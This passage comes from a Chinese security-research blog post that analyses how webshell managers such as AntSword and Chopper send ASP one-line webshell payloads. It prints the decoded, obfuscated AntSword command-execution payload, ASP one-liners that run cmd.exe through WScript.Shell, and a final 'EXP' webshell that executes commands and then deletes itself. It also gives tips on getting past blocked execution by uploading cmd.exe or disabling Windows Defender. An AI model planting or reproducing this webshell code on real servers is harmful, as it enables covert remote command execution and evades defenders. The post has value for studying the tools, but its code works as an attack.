class="hljs-comment">//最终的蚁剑的payload在URL解码之后的结果</span><br>chopper=<span class="hljs-built_in">eval</span>(<span class="hljs-string">&quot;Ex&quot;</span>&amp;cHr(<span class="hljs-number">101</span>)&amp;<span class="hljs-string">&quot;cute(&quot;</span><span class="hljs-string">&quot;</span><br><span class="hljs-string">	Server.ScriptTimeout=3600:</span><br><span class="hljs-string">	On Error Resume Next:</span><br><span class="hljs-string">	Function bd(byVal s):</span><br><span class="hljs-string">		For i=1 To Len(s) Step 2:</span><br><span class="hljs-string">			c=Mid(s,i,2):</span><br><span class="hljs-string">			If IsNumeric(Mid(s,i,1)) Then:</span><br><span class="hljs-string">				Execute(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;bd=bd&amp;chr(&amp;H&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&amp;c&amp;&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;)&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;):</span><br><span class="hljs-string">			Else:</span><br><span class="hljs-string">				Execute(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;bd=bd&amp;chr(&amp;H&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&amp;c&amp;Mid(s,i+2,2)&amp;&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;)&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;):</span><br><span class="hljs-string">			i=i+2:</span><br><span class="hljs-string">			End If&quot;</span><span class="hljs-string">&quot;&amp;chr(10)&amp;&quot;</span><span class="hljs-string">&quot;Next:</span><br><span class="hljs-string">		End Function:</span><br><span class="hljs-string">	Response.Write(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;499&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&amp;&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;be0e&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;):</span><br><span class="hljs-string">	Ex&quot;</span>&amp;cHr(<span class="hljs-number">101</span>)&amp;<span class="hljs-string">&quot;cute(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;On Error Resume Next:&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;</span><br><span class="hljs-string">	&amp;bd(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;53657420507574456E763D4372656174654F626A6563742822575363726970742E5368656C6C22292E456E7669726F6E6D656E74282250726F6365737322293A656E767374723D53706C69742822222662642852657175657374282263343938663634663134396539642229292622222C20227C7C7C61736C696E657C7C7C22293A466F72204561636820656E766C696E6520696E20656E767374723A4966204C656E28656E766C696E65293E30205468656E3A73733D53706C697428656E766C696E652C20227C7C7C61736B65797C7C7C22293A507574456E76287373283029293D73732831293A456E642049663A4E6578743A53657420583D4372656174654F626A6563742822777363726970742E7368656C6C22292E65786563282222222226626428526571756573742822746533333937393739396339633222292926222222202F6320222222266264285265717565737428226F643631663338333930653565372229292622222222293A496620457272205468656E3A533D225B4572725D2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A4F3D582E5374644F75742E52656164416C6C28293A453D582E5374644572722E52656164416C6C28293A533D4F26453A456E642049663A526573706F6E73652E7772697465285329&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;)):</span><br><span class="hljs-string">	Response.Write(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;2d40&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&amp;&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;4432&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;):</span><br><span class="hljs-string">	Response.End&quot;</span><span class="hljs-string">&quot;)&quot;</span>)<br>&amp;od61f38390e5e7=6364202F642022433A2F50726F6772616D2046696C65732F525A4B2F466F7274696C6F676765722F5765622F4173736574732F74656D702F686F7473706F742F696D67222677686F616D69266563686F20626237353136266364266563686F203065316130303330<br>&amp;te33979799c9c2=636D64<br></code></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>①以为和php一句话一样→②对webshell管理工具的asp一句话进行分析→③写出asp的一句话木马</p>
<ol>
<li>天真：以为一句话就真的只传递<code>cmd=whoami</code>一句话。其实在菜刀、C刀、蚁剑等webshell管理工具中使用的一句话内容十分长。</li>
<li>ASP只支持VB脚本，所以权限不足以调动执行命令，需要利用WSritcpt<ol>
<li><a target="_blank" rel="noopener" href="https://forum.90sec.org/thread-10607-1-1.html">https://forum.90sec.org/thread-10607-1-1.html</a>  asp中就一句话，wscript.shell，shell.application这两个组件存在一个都可以执行cmd，两个都禁用就gg</li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/asdlkfjdd/article/details/27797117">https://blog.csdn.net/asdlkfjdd/article/details/27797117</a></li>
</ol>
</li>
<li>ASP一句话木马<ol>
<li><a target="_blank" rel="noopener" href="https://lcx.cc/post/560/">https://lcx.cc/post/560/</a></li>
<li><code>&lt;%=CreateObject(&quot;wscript.shell&quot;).exec(&quot;cmd.exe /c ipconfig&quot;).StdOut.ReadAll()%&gt;</code></li>
<li>上述一句话可以执行</li>
</ol>
</li>
<li>为什么文件管理可以，命令执行不行<ol>
<li>因为调用的VB组件不同，详见：<a target="_blank" rel="noopener" href="https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp">https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp</a>。而可能命令执行所调用的组件被安全软件限制了，文件管理的则没限制</li>
</ol>
</li>
<li>asp文件调用后自删除<ol>
<li><code>CreateObject(&quot;Scripting.FileSystemObject&quot;).DeleteFile(server.mappath(Request.ServerVariables(&quot;SCRIPT_NAME&quot;)))</code></li>
<li>参考：<a target="_blank" rel="noopener" href="http://doc.bugscan.net/chapter3/3-3.html">bugscan的上传文件样例代码中ASP部分</a></li>
</ol>
</li>
<li>最终的EXP</li>
</ol>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs go">&lt;%<br>CreateObject(<span class="hljs-string">&quot;wscript.shell&quot;</span>).exec(<span class="hljs-string">&quot;cmd.exe /c %s&quot;</span>).StdOut.ReadAll()<br>CreateObject(<span class="hljs-string">&quot;Scripting.FileSystemObject&quot;</span>).DeleteFile(server.mappath(Request.ServerVariables(<span class="hljs-string">&quot;SCRIPT_NAME&quot;</span>)))<br>%&gt;<br></code></pre></td></tr></table></figure>

<h2 id="其他发现"><a href="#其他发现" class="headerlink" title="其他发现"></a>其他发现</h2><h3 id="冰蝎发送给服务器要执行的命令"><a href="#冰蝎发送给服务器要执行的命令" class="headerlink" title="冰蝎发送给服务器要执行的命令"></a>冰蝎发送给服务器要执行的命令</h3><p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%207.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="菜刀执行时拒绝访问的解决方案"><a href="#菜刀执行时拒绝访问的解决方案" class="headerlink" title="菜刀执行时拒绝访问的解决方案"></a>菜刀执行时拒绝访问的解决方案</h3><p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%208.png" srcset="/img/loading.gif" lazyload></p>
<p>可能的原因：</p>
<ol>
<li>可能启用了安全模式<ol>
<li>php开启disablefunction，仅仅在windows才生效</li>
<li>但是这里没有提示，那就应该是后一种</li>
</ol>
</li>
<li>cmd权限不足<ol>
<li>需要自己上传一个cmd.exe，注意windows server不能使用win10的cmd，需要对应版本</li>
</ol>
</li>
</ol>
<p>参考：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/7126aa9e5a89">菜刀cmd执行命令拒绝访问 安全模式(解决)</a></p>
<blockquote>
<p>上述方案都不行，最后发现是windows defender开启的缘故（我在win10上搭建的环境），一句话命令执行调用cmd被windows defender给拒了，关闭windows defender即可</p>
</blockquote>
<h3 id="Asp中Request和Request-QueryString区别"><a href="#Asp中Request和Request-QueryString区别" class="headerlink" title="Asp中Request和Request.QueryString区别"></a>Asp中Request和Request.QueryString区别</h3><p>背景：因为我一度怀疑没有获取到变量的值才导致的服务器出错问题</p>
<p>解答：<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/9196476/request-versus-request-querystring">细微区别</a>，①前者是一个大类总理，其获取参数会依次从QueryString，cookie等对象中查找。②针对同名的参数即出现在querystring又出现在cookie中，则使用request则可能会因为检索次序而获取到非预期的对象②针对非同名则二者在使用上没区别</p>
<h3 id="asp和aspx的区别"><a href="#asp和aspx的区别" class="headerlink" title="asp和aspx的区别"></a>asp和aspx的区别</h3><p>参考：<a target="_blank" rel="noopener" href="https://zhidao.baidu.com/question/71286653.html">百度知道</a>，<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36119192/article/details/84593150">CSDN</a></p>
<p><a target="_blank" rel="noopener" href="https://www.notion.so/01e48956224f44d98522cb919c7ebda4">Untitled</a></p>

                            </div>
                            
                                <p class="note note-info">
                                    
                                                    本文最后更新于：
                                                        2022年6月10日 上午
                                                            
                                </p>
                                
                                    <hr>
                                    <div>
                                        <div class="post-metas mb-3">
                                            
                                                <div class="post-meta mr-3">
                                                    <i class="iconfont icon-category"></i>
                                                    
                                                        <a class="hover-with-bg" href="/categories/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/">
                                                            安全研究
                                                        </a>
                                                        
                                                </div>
                                                
                                                    
                                                        <div class="post-meta">
                                                            <i class="iconfont icon-tags"></i>
                                                            
                                                                <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">
                                                                    渗透测试
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/">
                                                                    安全研究
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%A2%B3%E7%90%86/">
                                                                    知识点梳理
                                                                </a>
                                                                
                                                        </div>
                                                        
                                        </div>
                                        
                                            <p class="note note-warning">
                                                
                                                            本博客所有文章欢迎转载 ，但希望转载时能注明出处！ </br>关于文章，如有疑问，欢迎讨论！Email:corp0ra1@qq.com </br>如果图片无法显示:https://corp0ra1.github.io/common/imageLoad.html
                                                                
                                            </p>
                                            
                                                
                                                    <div class="post-prevnext">
                                                        <article class="post-prev col-6">
                                                            
                                                                
                                                                    <a href="/2021/06/25/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/">
                                                                        <i class="iconfont icon-arrowleft"></i>
                                                                        <span class="hidden-mobile">记一次不停自我追问式的学习</span>
                                                                        <span class="visible-mobile">上一篇</span>
                                                                    </a>
                                                                    
                                                        </article>
                                                        <article class="post-next col-6">
                                                            
                                                                
                                                                    <a href="/2021/02/02/%5Bnotion%5Dhost%E5%A4%B4%E7%9A%84%E7%A0%94%E7%A9%B6/">
                                                                        <span class="hidden-mobile">HOST头漏洞的研究</span>
                                                                        <span class="visible-mobile">下一篇</span>
                                                                        <i class="iconfont icon-arrowright"></i>
                                                                    </a>
                                                                    
                                                        </article>
                                                    </div>
                                                    
                                    </div>

                                    
                        </article>
                    </div>
                </div>
            </div>
            
                <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
                    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

                </div>
                
        </div>
    </div>

    <!-- Custom -->
    
    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <div class="copyright">©2020 - 2021 By Corp0ra1</div> </div> <div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> &nbsp;|&nbsp; <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> &nbsp;|&nbsp; <a href="https://github.com/jsdelivr/jsdelivr" target="_blank" rel="nofollow noopener"><span>jsDelivr</span></a> </div> 
  </div>
  <!--添加运行时间-->
<div id="sitetime"></div>
<script language=javascript>
    function siteTime() {
        window.setTimeout("siteTime()", 1000);
        var seconds = 1000;
        var minutes = seconds * 60;
        var hours = minutes * 60;
        var days = hours * 24;
        var years = days * 365;
        var today = new Date();
        var todayYear = today.getFullYear();
        var todayMonth = today.getMonth() + 1;
        var todayDate = today.getDate();
        var todayHour = today.getHours();
        var todayMinute = today.getMinutes();
        var todaySecond = today.getSeconds();
        /* 
      Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
      year - 作为date对象的年份，为4位年份值
      month - 0-11之间的整数，做为date对象的月份
      day - 1-31之间的整数，做为date对象的天数
      hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
      minutes - 0-59之间的整数，做为date对象的分钟数
      seconds - 0-59之间的整数，做为date对象的秒数
      microseconds - 0-999之间的整数，做为date对象的毫秒数
     */
        var t1 = Date.UTC(2021, 05, 01, 00, 00, 00); //北京时间2018-2-13 00:00:00
        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
        var diff = t2 - t1;
        var diffYears = Math.floor(diff / years);
        var diffDays = Math.floor((diff / days) - diffYears * 365);
        var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
        var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) / minutes);
        var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours - diffMinutes * minutes) / seconds);
        document.getElementById("sitetime").innerHTML = "很高兴遇到你，我已经在此等候了你 " + /*diffYears+" 年 "+*/ diffDays + " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
    }
    siteTime();
</script>

    <div class="statistics">
        
            

                
                                                
                                                    <!-- 不蒜子统计PV -->
                                                    <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            
            <span id="busuanzi_value_site_pv"></span>
                                                     次
                                                        &nbsp; <span class="iconfont icon-love"></span></span>
                                                        

                                                            

                                                                <!-- 不蒜子统计UV -->
                                                                <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            
            <span id="busuanzi_value_site_uv"></span>
                                                                 人
                                                                    </span>
                                                                    
                                                                        
    </div>
    
  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












    
        <!-- Baidu Analytics -->
        <script defer>
            var _hmt = _hmt || [];
            (function() {
                var hm = document.createElement("script");
                hm.src = "https://hm.baidu.com/hm.js?a1a4ccab78dfa522556928ac810fa739";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(hm, s);
            })();
        </script>
        

            
                <!-- Google Analytics -->
                <!-- <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-4X9XV0H0D5', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script> -->
                <!-- Global site tag (gtag.js) - Google Analytics -->
                <script async src="https://www.googletagmanager.com/gtag/js?G-4X9XV0H0D5"></script>
                <script>
                    window.dataLayer = window.dataLayer || [];

                    function gtag() {
                        dataLayer.push(arguments);
                    }
                    gtag('js', new Date());

                    gtag('config', 'G-4X9XV0H0D5');
                </script>
                

                    

                            

                                    

                                            
                                                    



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
